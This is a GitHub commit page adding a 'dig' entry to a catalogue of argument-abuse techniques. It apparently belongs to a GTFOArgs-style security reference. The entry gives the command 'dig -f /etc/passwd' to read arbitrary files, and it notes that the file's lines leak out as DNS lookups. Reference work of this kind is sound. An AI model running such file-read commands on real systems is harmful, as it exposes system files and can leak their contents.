Skip to content

Commit

Permalink
Merge pull request #5 from hlein/dig
Browse files Browse the repository at this point in the history
Add dig
  • Loading branch information
MegaManSec authored Dec 25, 2023
2 parents eb9074d + 1372903 commit b4dd634
Showing 1 changed file with 7 additions and 0 deletions.
7 changes: 7 additions & 0 deletions _gtfoargs/dig.md
Original file line number Diff line number Diff line change
@@ -0,0 +1,7 @@
---
functions:
file-read:
- description: Read an arbitrary file by specifying it as a batch file. Note that this will leak lines of the file read as outbound DNS lookups.
code: |
dig -f /etc/passwd
---

0 comments on commit b4dd634

Please sign in to comment.